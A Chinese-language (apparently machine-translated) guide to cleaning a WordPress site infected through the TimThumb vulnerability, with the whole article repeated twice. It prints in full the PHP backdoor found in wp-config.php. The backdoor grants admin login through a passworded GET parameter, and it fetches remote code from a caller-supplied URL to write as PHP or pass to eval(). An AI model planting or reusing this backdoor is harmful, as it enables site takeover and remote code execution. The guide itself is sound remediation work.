如何在WordPress中修复和清理TimThumb Hack

所以，如果你没记错的话，8月份的TimThumb脚本存在安全问题。但令我们惊讶的是，许多网站仍在使用旧版本。到目前为止，我们在过去一个月内修复了三个网站，一个是昨天。因此，简单地编写一步一步的文章是有道理的，因此我们的用户可以遵循它。我们解决这个问题的三个用户都不知道TimThumb是什么，或者他们是否使用它。

TimThumb是一个调整图像大小的PHP脚本。它有一个漏洞，但现在使用它是安全的。

那你怎么知道你的网站被黑了？如果您在访问自己的网站时在浏览器上看到一个大红色屏幕：

如果您开始收到有关用户从您的网站重定向的电子邮件的轰炸。最有可能的情况是，您的网站是此漏洞的受害者。

作为一项预防措施，每个人都应该使用这个Timthumb漏洞扫描程序。这将告诉您是否使用旧版TimThumb。许多主题俱乐部立即升级了他们的核心。因此，这个插件将检查是否安装了新的安全版本的Timthumb或是否安装了旧版本。

现在，如果您的网站已经成为这个Timthumb漏洞的牺牲品，那么这就是您需要做的事情。

首先，您需要删除以下文件：

/wp-admin/upd.php  /wp-content/upd.php

登录WordPress管理面板并重新安装WordPress版本。我们特意寻找重新安装这些文件：

  /wp-settings.php  /wp-includes/js/jquery/jquery.js  /wp-includes/js/110n.js  

然后打开你的 wp-config.php 你最有可能找到这个收集登录凭据的大恶意软件代码和饼干。此代码将显示在底部。

  if (isset($_GET["pingnow"])&& isset($_GET["pass"])){  if ($_GET["pass"] == "19ca14e7ea6328a42e0eb13d585e4c22"){  if ($_GET["pingnow"]== "login"){  $user_login = "admin";  $user = get_userdatabylogin($user_login);  $user_id = $user->ID;  wp_set_current_user($user_id, $user_login);  wp_set_auth_cookie($user_id);  do_action("wp_login", $user_login);  }  if (($_GET["pingnow"]== "exec")&&(isset($_GET["file"]))){  $ch = curl_init($_GET["file"]);  $fnm = md5(rand(0,100)).".php";  $fp = fopen($fnm, "w");  curl_setopt($ch, CURLOPT_FILE, $fp);  curl_setopt($ch, CURLOPT_HEADER, 0);  curl_setopt($ch, CURLOPT_TIMEOUT, 5);  curl_exec($ch);  curl_close($ch);  fclose($fp);  echo "<SCRIPT LANGUAGE="JavaScript">location.href="$fnm";</SCRIPT>";  }  if (($_GET["pingnow"]== "eval")&&(isset($_GET["file"]))){  $ch = curl_init($_GET["file"]);  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  curl_setopt($ch, CURLOPT_HEADER, 0);  curl_setopt($ch, CURLOPT_TIMEOUT, 5);  $re = curl_exec($ch);  curl_close($ch);  eval($re);  }}}  

在您的主题文件夹中，查找TimThumb脚本可能存储缓存文件的任何位置。通常它们处于这种结构中：

  /wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php  /wp-content/themes/themename/temp/cache/external_{MD5Hash}.php  

删除看起来像这样的所有内容。如果您对某些事情不确定，请删除不是图像文件的所有内容。

您要做的下一件事是将timthumb.php替换为最新版本，可以在http：// timthumb找到。googlecode.com/svn/trunk/timthumb.php

现在，从MySQL登录信息开始，将密码更改为WordPress登录信息是个不错的主意。不要忘记在wp-config.php中更改MySQL的密码，否则将出现“Error Establishing Connection”屏幕。

更改wp-config.php文件中的密钥。您可以通过转到在线生成器来生成新密钥。

现在您已完成。不要忘记清空所有页面缓存插件。作为一种警示措施，最好清除浏览器缓存和cookie。

对于开发人员，请尝试使用WordPress中的“附加图像大小”功能来替换Timthumb功能。

所以，如果你没记错的话，8月份的TimThumb脚本存在安全问题。但令我们惊讶的是，许多网站仍在使用旧版本。到目前为止，我们在过去一个月内修复了三个网站，一个是昨天。因此，简单地编写一步一步的文章是有道理的，因此我们的用户可以遵循它。我们解决这个问题的三个用户都不知道TimThumb是什么，或者他们是否使用它。

TimThumb是一个调整图像大小的PHP脚本。它有一个漏洞，但现在使用它是安全的。

那你怎么知道你的网站被黑了？如果您在访问自己的网站时在浏览器上看到一个大红色屏幕：

如果您开始收到有关用户从您的网站重定向的电子邮件的轰炸。最有可能的情况是，您的网站是此漏洞的受害者。

作为一项预防措施，每个人都应该使用这个Timthumb漏洞扫描程序。这将告诉您是否使用旧版TimThumb。许多主题俱乐部立即升级了他们的核心。因此，这个插件将检查是否安装了新的安全版本的Timthumb或是否安装了旧版本。

现在，如果您的网站已经成为这个Timthumb漏洞的牺牲品，那么这就是您需要做的事情。

首先，您需要删除以下文件：

/wp-admin/upd.php  /wp-content/upd.php

登录WordPress管理面板并重新安装WordPress版本。我们特意寻找重新安装这些文件：

  /wp-settings.php  /wp-includes/js/jquery/jquery.js  /wp-includes/js/110n.js  

然后打开你的 wp-config.php 你最有可能找到这个收集登录凭据的大恶意软件代码和饼干。此代码将显示在底部。

  if (isset($_GET["pingnow"])&& isset($_GET["pass"])){  if ($_GET["pass"] == "19ca14e7ea6328a42e0eb13d585e4c22"){  if ($_GET["pingnow"]== "login"){  $user_login = "admin";  $user = get_userdatabylogin($user_login);  $user_id = $user->ID;  wp_set_current_user($user_id, $user_login);  wp_set_auth_cookie($user_id);  do_action("wp_login", $user_login);  }  if (($_GET["pingnow"]== "exec")&&(isset($_GET["file"]))){  $ch = curl_init($_GET["file"]);  $fnm = md5(rand(0,100)).".php";  $fp = fopen($fnm, "w");  curl_setopt($ch, CURLOPT_FILE, $fp);  curl_setopt($ch, CURLOPT_HEADER, 0);  curl_setopt($ch, CURLOPT_TIMEOUT, 5);  curl_exec($ch);  curl_close($ch);  fclose($fp);  echo "<SCRIPT LANGUAGE="JavaScript">location.href="$fnm";</SCRIPT>";  }  if (($_GET["pingnow"]== "eval")&&(isset($_GET["file"]))){  $ch = curl_init($_GET["file"]);  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  curl_setopt($ch, CURLOPT_HEADER, 0);  curl_setopt($ch, CURLOPT_TIMEOUT, 5);  $re = curl_exec($ch);  curl_close($ch);  eval($re);  }}}  

在您的主题文件夹中，查找TimThumb脚本可能存储缓存文件的任何位置。通常它们处于这种结构中：

  /wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php  /wp-content/themes/themename/temp/cache/external_{MD5Hash}.php  

删除看起来像这样的所有内容。如果您对某些事情不确定，请删除不是图像文件的所有内容。

您要做的下一件事是将timthumb.php替换为最新版本，可以在http：// timthumb找到。googlecode.com/svn/trunk/timthumb.php

现在，从MySQL登录信息开始，将密码更改为WordPress登录信息是个不错的主意。不要忘记在wp-config.php中更改MySQL的密码，否则将出现“Error Establishing Connection”屏幕。

更改wp-config.php文件中的密钥。您可以通过转到在线生成器来生成新密钥。

现在您已完成。不要忘记清空所有页面缓存插件。作为一种警示措施，最好清除浏览器缓存和cookie。

对于开发人员，请尝试使用WordPress中的“附加图像大小”功能来替换Timthumb功能。